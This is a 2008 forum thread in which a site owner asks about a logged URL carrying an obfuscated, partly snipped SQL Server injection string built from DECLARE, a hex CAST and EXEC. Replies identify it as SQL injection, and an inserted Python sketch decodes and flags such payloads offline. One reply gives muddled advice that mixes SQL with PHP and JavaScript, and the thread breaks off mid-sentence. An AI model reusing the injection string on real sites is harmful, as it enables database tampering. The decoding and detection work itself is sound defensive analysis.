-
Sep 22, 2008, 12:41 #1
What does this URL attempt to do?
What exactly is someone attempting by accessing this url on my site?
Code:
/?;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434 <snipped about 1200 chars> 736F72 AS CHAR(4000));EXEC(@S);
-
Sep 22, 2008, 15:16 #2
I'm sure the answer is in the "snipped about 1200 chars".
I'm also sure the code is obfuscated. To see what it "translates" to, if you're willing to take the chance (carefully weigh the risk against your curiosity), run the code without the exec(). Instead try changing that to echo(@s) - PHP, or document.write(@s) - JavaScript.
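Seeing what the hex blob says without running it, as post #2 wants, can be done entirely offline. The sketch below is an added example, not part of the thread: it pulls each `CAST(0x… AS CHAR(n))` literal out of a logged request line and decodes it in Python, with no database involved. The function names and the sample request are constructed for illustration; the sample payload is a harmless stand-in, since the thread's own payload was snipped.

```python
import re
from urllib.parse import unquote_plus

# Matches the CAST(0x<hex> AS CHAR(n)) wrapper seen in the logged request.
CAST_HEX = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\s*\)", re.I
)


def decode_payloads(request_line: str) -> list[str]:
    """Return the text hidden in every CAST(0x.. AS CHAR(n)) of one request.

    Decoding happens purely in Python: nothing is sent to a database and
    nothing is executed.
    """
    decoded = []
    for match in CAST_HEX.finditer(unquote_plus(request_line)):
        hex_digits = match.group(1)
        if len(hex_digits) % 2:  # truncated log line: drop the odd nibble
            hex_digits = hex_digits[:-1]
        # CHAR data is single-byte; latin-1 maps every byte, so this never raises.
        decoded.append(bytes.fromhex(hex_digits).decode("latin-1"))
    return decoded


def looks_like_hex_exec_injection(request_line: str) -> bool:
    """Flag requests that DECLARE a variable, fill it from hex and EXEC it."""
    line = unquote_plus(request_line).upper()
    return bool(
        CAST_HEX.search(line)
        and "DECLARE" in line
        and re.search(r"\bEXEC\s*\(", line)
    )


# Constructed sample request (URL-encoded, as it would appear in an access log).
SAMPLE_SQL = "SELECT 'constructed sample'"
SAMPLE_REQUEST = (
    "/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S);"
)

if __name__ == "__main__":
    if looks_like_hex_exec_injection(SAMPLE_REQUEST):
        for text in decode_payloads(SAMPLE_REQUEST):
            print("decoded payload:", text)
```

Run over access-log lines, `looks_like_hex_exec_injection` also helps find other requests using the same pattern.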
-
Sep 22, 2008, 15:16 #3
This may be successful when your site has SQL injection. For example, when it queries the database for content which corresponds to the current URL and the URL is not escaped, then you may have SQL injection.
-
Sep 23, 2008, 09:07 #4
Yep, it looks like a SQL injection attack. By appending the string to a URL request they may be able to modify the field values of your database table to include the following string